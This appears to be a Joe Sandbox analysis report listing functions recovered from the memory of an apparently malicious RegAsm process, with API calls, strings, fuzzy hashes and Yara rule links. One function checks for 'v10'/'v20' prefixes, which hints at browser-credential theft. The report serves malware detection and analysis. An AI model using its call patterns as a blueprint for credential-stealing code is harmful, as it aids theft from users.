Similarity

API ID: ExitProcess$DefaultLangUser
String ID: B
API String ID: 1494266314-2248957098
Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96

Function 6C2F1220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2F124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2F1268
GetCurrentThreadId.KERNEL32 ref: 6C2F12DA
InitializeConditionVariable.KERNEL32(?), ref: 6C2F134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C2F138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C2F1431

Part of subcall function 6C2E8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C301563), ref: 6C2E8BD5

free.MOZGLUE(?), ref: 6C2F145A
free.MOZGLUE(?), ref: 6C2F146C

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: dde96ea17f1cfe365ae7d309e145a4f9df82cbc9124d4966c4d519832d81c87a
Instruction ID: 3de065d6e9567a4c35b52af3162a980f2d86fdc00c6a6a600c27126f7f8d8788
Opcode Fuzzy Hash: dde96ea17f1cfe365ae7d309e145a4f9df82cbc9124d4966c4d519832d81c87a
Instruction Fuzzy Hash: 7E619C75A043489BDB11DF25C880B9AF7F5AFC5308F44891DEDA947712EB71E48ACB42

Function 6C2F0F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2F0F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2F0F88
GetCurrentThreadId.KERNEL32 ref: 6C2F0FF7
InitializeConditionVariable.KERNEL32(?), ref: 6C2F1067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C2F10A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C2F114B

Part of subcall function 6C2E8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C301563), ref: 6C2E8BD5

free.MOZGLUE(?), ref: 6C2F1174
free.MOZGLUE(?), ref: 6C2F1186

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 8aaf62bc2fc98f09fc517987161b01d3bda47f1896ea039f9222f8b8d2232fb9
Instruction ID: eb653c0cb8590ac39cf64510e64f7bb528f5241be5cb5f59beb9c78140bf0d23
Opcode Fuzzy Hash: 8aaf62bc2fc98f09fc517987161b01d3bda47f1896ea039f9222f8b8d2232fb9
Instruction Fuzzy Hash: 9661AE75A043499BDB11DF25C880B9AF7F6AFC5308F44891DECA947711DB31E48ACB42

Function 00409E10 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
memset.MSVCRT ref: 00409EE8
LocalAlloc.KERNEL32(00000040,?), ref: 00409F41

Strings

@, xrefs: 00409EF1
v10, xrefs: 00409EA3
v20, xrefs: 00409E21
ERROR_RUN_EXTRACTOR, xrefs: 00409E67

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 1977917189-1096346117
Opcode ID: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
Opcode Fuzzy Hash: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A

Function 6C2A4B50 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C2A4667,?,?,?,?,?,?,?,?,6C2E4843,?), ref: 6C2A4C63
free.MOZGLUE(?,?,?,6C2A4667,?,?,?,?,?,?,?,?,6C2E4843,?), ref: 6C2A4C89
free.MOZGLUE(?,?,?,6C2A4667,?,?,?,?,?,?,?,?,6C2E4843,?), ref: 6C2A4CAC
free.MOZGLUE(?,?,?,?,?,?,?,6C2E4843,?), ref: 6C2A4CCF
free.MOZGLUE(?,?,?,?,?,?,?,?,6C2E4843,?), ref: 6C2A4CF2
free.MOZGLUE(?,?,?,?,?,?,?,?,6C2E4843,?), ref: 6C2A4D15
free.MOZGLUE(?,?,?,?,?,?,?,?,6C2E4843,?), ref: 6C2A4D38
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C2A4667,?,?,?,?,?,?,?,?,6C2E4843,?), ref: 6C2A4DD1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1497960986-0
Opcode ID: 440e17a6d65063c91fcb34ce68d7bb021625fd31216a86e624a26629c4d380e4
Instruction ID: 4fe4ea5d4beb70676979ccb3f2b008f4a41d373accce1b970d3d23f0f9a18a5e
Opcode Fuzzy Hash: 440e17a6d65063c91fcb34ce68d7bb021625fd31216a86e624a26629c4d380e4
Instruction Fuzzy Hash: CE519271504B488FD3248ABCD9A475AB6A6AF02328F445F1CF8ABCBFD1DB35E4458742

Function 6C2AE9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6C2B1999), ref: 6C2AEA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C2AEA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C2AEA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6C2B1999), ref: 6C2AEA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C2B1999), ref: 6C2AEAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C2AEADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C2AEB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C2AEB27

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: e6b1e6a7051cac7d6fb2ffaa0d48a3ef405bd75fe790957c7aa41abd2352d8ea
Instruction ID: be0391ee5094a5baa4468dc88379c1865ea1c439d4e8aba19335545b139a0b95
Opcode Fuzzy Hash: e6b1e6a7051cac7d6fb2ffaa0d48a3ef405bd75fe790957c7aa41abd2352d8ea
Instruction Fuzzy Hash: F04198B19002199FDB14CFA8DC80AAE77A8FF55368F240634EC15E7795E730D91687D1

Function 6C2FD310 Relevance: 12.1, APIs: 8, Instructions: 132threadtimeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2FD36B
GetCurrentThreadId.KERNEL32 ref: 6C2FD38A
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD39D
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FD3E1
free.MOZGLUE ref: 6C2FD408

Part of subcall function 6C2DCBE8: GetCurrentProcess.KERNEL32(?,6C2A31A7), ref: 6C2DCBF1
Part of subcall function 6C2DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2A31A7), ref: 6C2DCBFA

GetCurrentThreadId.KERNEL32 ref: 6C2FD44B
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD457
ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6C2FD472

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
String ID:
API String ID: 3843575911-0
Opcode ID: b54420a95816d7ee0b2649a8072bbbf0820a002f592512a55165ebe7c88dc73f
Instruction ID: ee5cd21366ebdae1b1a0e92f7015a64165783273c5ba002ae3dada0649b1f7ca
Opcode Fuzzy Hash: b54420a95816d7ee0b2649a8072bbbf0820a002f592512a55165ebe7c88dc73f
Instruction Fuzzy Hash: DD41DF756043098FCB10DF64C488A9AFBB9FF85318F104A2DEDA687740DB75A949CB91

Function 6C2AB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C2AB61E,?,?,?,?,?,00000000), ref: 6C2AB6AC

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C2AB61E,?,?,?,?,?,00000000), ref: 6C2AB6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C2AB61E,?,?,?,?,?,00000000), ref: 6C2AB6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C2AB61E,?,?,?,?,?,00000000), ref: 6C2AB70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C2AB61E,?,?,?,?,?,00000000), ref: 6C2AB71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C2AB61E), ref: 6C2AB73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C2AB61E,?,?,?,?,?,00000000), ref: 6C2AB760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C2AB61E,?,?,?,?,?,00000000), ref: 6C2AB79A

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: d26d19b6c0e18840e0d74f8988a227d6fb604b1e9632a53579272157245da4ac
Instruction ID: 5f5bad22355b6ddd5640d56a2f9fee57d8233a7df9ecb0321512717be447c121
Opcode Fuzzy Hash: d26d19b6c0e18840e0d74f8988a227d6fb604b1e9632a53579272157245da4ac
Instruction Fuzzy Hash: B641A2B2D0011D9FCB04DEA8DC809AEB7B9BB45324B250669EC25E7790E771E905CBD1

Function 6C2AEF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6C325104), ref: 6C2AEFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C2AEFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C2AEFEC
free.MOZGLUE(?), ref: 6C2AF00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C2AF02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C2AF041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AF065
moz_xmalloc.MOZGLUE ref: 6C2AF072

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: 977923e4ad136727ab2fcddeedc17d74ba3304baf7cfbedb67f0597e7cb30465
Instruction ID: 87d10170d6e7e859466c18326ff8644a239eba2af05dd16817b07400e30a9ced
Opcode Fuzzy Hash: 977923e4ad136727ab2fcddeedc17d74ba3304baf7cfbedb67f0597e7cb30465
Instruction Fuzzy Hash: 2A41F8B1A001099FCB08CFA8DC809AF7369FF88314B240628EC15DB794EB31E916C7E1

Function 6C31B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C31B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C31B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C31B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C31B5F4
__Init_thread_footer.LIBCMT ref: 6C31B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C31B61F
std::_Facet_Register.LIBCPMT ref: 6C31B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C31B655

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 304ecc803b823a0f790b6048713957c552313cfeb67a7947e6ce58b811267cfe
Instruction ID: 2df0bd27b53de063caa1537bc054463f280023f5ee896e93d371cf4cce8fe5bf
Opcode Fuzzy Hash: 304ecc803b823a0f790b6048713957c552313cfeb67a7947e6ce58b811267cfe
Instruction Fuzzy Hash: 673193B1B00214CFCF14DF69C8589AEB7B9FF8A329B15051DD9069B740DB39A806CF91

Function 6C2E6590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C2DFA80: GetCurrentThreadId.KERNEL32 ref: 6C2DFA8D
Part of subcall function 6C2DFA80: AcquireSRWLockExclusive.KERNEL32(6C32F448), ref: 6C2DFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2E6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C2E67C8

Part of subcall function 6C2F4290: memcpy.VCRUNTIME140(?,?,6C302003,6C300AD9,?,6C300AD9,00000000,?,6C300AD9,?,00000004,?,6C301A62,?,6C302003,?), ref: 6C2F42C4

Strings

data, xrefs: 6C2E6593
v2l, xrefs: 6C2E696C

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$v2l
API String ID: 511789754-4226928689
Opcode ID: e3a5657e9e430654a4052c399b907c06a42c510a66c5aa2192344caa6eab3367
Instruction ID: 7b5b7b3ce7b9b14728c56be94b9b1ffde9f18605e876986bf42a1dbed0ac6d62
Opcode Fuzzy Hash: e3a5657e9e430654a4052c399b907c06a42c510a66c5aa2192344caa6eab3367
Instruction Fuzzy Hash: 12D1EF75A083488FD724CF25C891B9FB7E5AFC9308F50492DEA9997B50DB34E809CB52

Function 6C2DD5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C2AEB57,?,?,?,?,?,?,?,?,?), ref: 6C2DD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C2AEB57,?), ref: 6C2DD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C2AEB57,?), ref: 6C2DD673
free.MOZGLUE(?), ref: 6C2DD888

Strings

|Enabled, xrefs: 6C2DD81E
W*l, xrefs: 6C2DD5D9, 6C2DD63F

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: W*l$|Enabled
API String ID: 4142949111-2020687950
Opcode ID: 2e3c6ff65ad1e20bc9668739dd511ef6f481842b3c44143c9a399b086b91394d
Instruction ID: 692419894bc53c4aedcb701389b35a7ca5172ffbcc13b4dbf66be03962f8cf79
Opcode Fuzzy Hash: 2e3c6ff65ad1e20bc9668739dd511ef6f481842b3c44143c9a399b086b91394d
Instruction Fuzzy Hash: 37A1F3B0A007499FDB11CF68C490BEEBBF1AF59318F15805CEC85AB741C735A886CBA1

Function 6C2B9830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C307ABE), ref: 6C2B985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C307ABE), ref: 6C2B98A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C2B9909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C2B9918
free.MOZGLUE(?), ref: 6C2B9975

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: ec326313e3e7a20df13b628625d89124185899e921b4a22a93e66d73b6c6fa4c
Instruction ID: 33ef6a6de278b9c32f0652734414f6cd76b02413004214b5ee513b95dd2f8060
Opcode Fuzzy Hash: ec326313e3e7a20df13b628625d89124185899e921b4a22a93e66d73b6c6fa4c
Instruction Fuzzy Hash: A071AA74600B098FC769DF28C480956B7F5FF5A3687244AA9EC5AEBB90C331F851CB50

Function 6C2BB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C2FCC83,?,?,?,?,?,?,?,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2BB7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C2FCC83,?,?,?,?,?,?,?,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2BB80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C2FCC83,?,?,?,?,?,?,?,?,?,6C2FBCAE), ref: 6C2BB88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C2FCC83,?,?,?,?,?,?,?,?,?,6C2FBCAE,?,?,6C2EDC2C), ref: 6C2BB896

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: db47a0e33f4f3c4d461931439c64963d2e1263a373adb32c1ee522792d5dc31a
Instruction ID: aec5d9b96b7041be2fec324ae97472adc7660dd9cec448b0d3c0b951738c7030
Opcode Fuzzy Hash: db47a0e33f4f3c4d461931439c64963d2e1263a373adb32c1ee522792d5dc31a
Instruction Fuzzy Hash: F35188357006098FCB24CF19C5C4E6ABBF5FF88359B69895DE98AAB751C730E801CB80

